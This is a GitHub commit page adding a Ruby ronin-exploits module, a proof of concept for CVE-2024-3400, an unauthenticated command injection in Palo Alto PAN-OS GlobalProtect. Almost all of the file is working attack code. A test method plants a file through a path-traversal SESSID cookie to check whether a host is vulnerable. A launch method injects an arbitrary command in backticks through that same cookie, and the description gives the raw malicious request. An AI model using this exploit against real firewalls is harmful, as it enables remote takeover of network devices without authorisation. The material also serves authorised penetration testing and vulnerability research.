-
-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
e39e17e
commit dda985a
Showing
1 changed file
with
92 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,92 @@ | ||
| #!/usr/bin/env -S ronin-exploits run -f | ||
|
|
||
| require 'ronin/exploits/command_injection' | ||
| require 'ronin/exploits/mixins/http' | ||
|
|
||
| module Ronin | ||
| module Exploits | ||
| # | ||
| # PoC for CVE-2024-3400. | ||
| # | ||
| # This exploit is based on the following previous PoCs: | ||
| # | ||
| # * https://github.com/CONDITIONBLACK/CVE-2024-3400-POC | ||
| # * https://github.com/ZephrFish/CVE-2024-3400-Canary | ||
| # * https://github.com/Kr0ff/cve-2024-3400 | ||
| # | ||
| class CVE_2024_3400 < CommandInjection | ||
|
|
||
| include Mixins::HTTP | ||
|
|
||
| register 'palo-alto/pan-os/CVE-2024-3400' | ||
|
|
||
| quality :untested | ||
| release_date '2024-04-16' | ||
| disclosure_date '2024-04-12' | ||
| advisory 'CVE-2024-3400' | ||
|
|
||
| author "Postmodern", email: "[email protected]" | ||
| summary "Command injection in Palo Alto Networks PAN-OS" | ||
| description <<~DESC | ||
| Palo Alto Networks PAN-OS is vulnerable to a remote unauthenticated | ||
| command injection via the `SESSID` cookie parameter in it's | ||
| GlobalProtect feature. | ||
| GET /global-protect/login.esp HTTP/1.1 | ||
| Host: example.com | ||
| Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`COMMAND` | ||
| DESC | ||
| references [ | ||
| "https://github.com/CONDITIONBLACK/CVE-2024-3400-POC", | ||
| "https://github.com/ZephrFish/CVE-2024-3400-Canary", | ||
| "https://github.com/Kr0ff/cve-2024-3400" | ||
| ] | ||
|
|
||
| # | ||
| # Test whether the target system is vulnerable. | ||
| # | ||
| # It does this by sending a HTTP POST request to `/ssl-vpn/hipreport.esp` | ||
| # with the `SESSID` cookie parameter containing a path traversal back into | ||
| # the web application's images directory | ||
| # (`/global-protect/portal/images/`), which causes the `test.txt` file to | ||
| # be created within the images directory. | ||
| # | ||
| # If `/global-protect/portal/images/test.txt` can then be requested, and | ||
| # it returns a HTTP 403 status code, the host is considered vulnerable. | ||
| # | ||
| def test | ||
| file_name = 'test.txt' | ||
| file_path = "/global-protect/portal/images/#{file_name}" | ||
|
|
||
| sessid = File.join("../../../var/appweb/sslvpndocs",file_path) | ||
|
|
||
| response = http_post( | ||
| '/ssl-vpn/hipreport.esp', cookie: {'SESSID' => sessid} | ||
| ) | ||
|
|
||
| if response.code == '200' | ||
| if http_get(file_path).code == '403' | ||
| Vulnerable('host is vulnerable') | ||
| else | ||
| NotVulnerable('host is patched') | ||
| end | ||
| else | ||
| NotVulnerable('host is patched') | ||
| end | ||
| end | ||
|
|
||
| # | ||
| # Sends a HTTP GET request to `/global-protect/login.esp` with the | ||
| # `SESSID` cookie parameter containing a directory traversal and the | ||
| # command payload wrapped in backticks. | ||
| # | ||
| def launch | ||
| sessid = "../../../../opt/panlogs/tmp/device_telemetry/minute/`#{payload}`" | ||
|
|
||
| http_get('/global-protect/login.esp', cookie: {'SESSID' => sessid}) | ||
| end | ||
|
|
||
| end | ||
| end | ||
| end |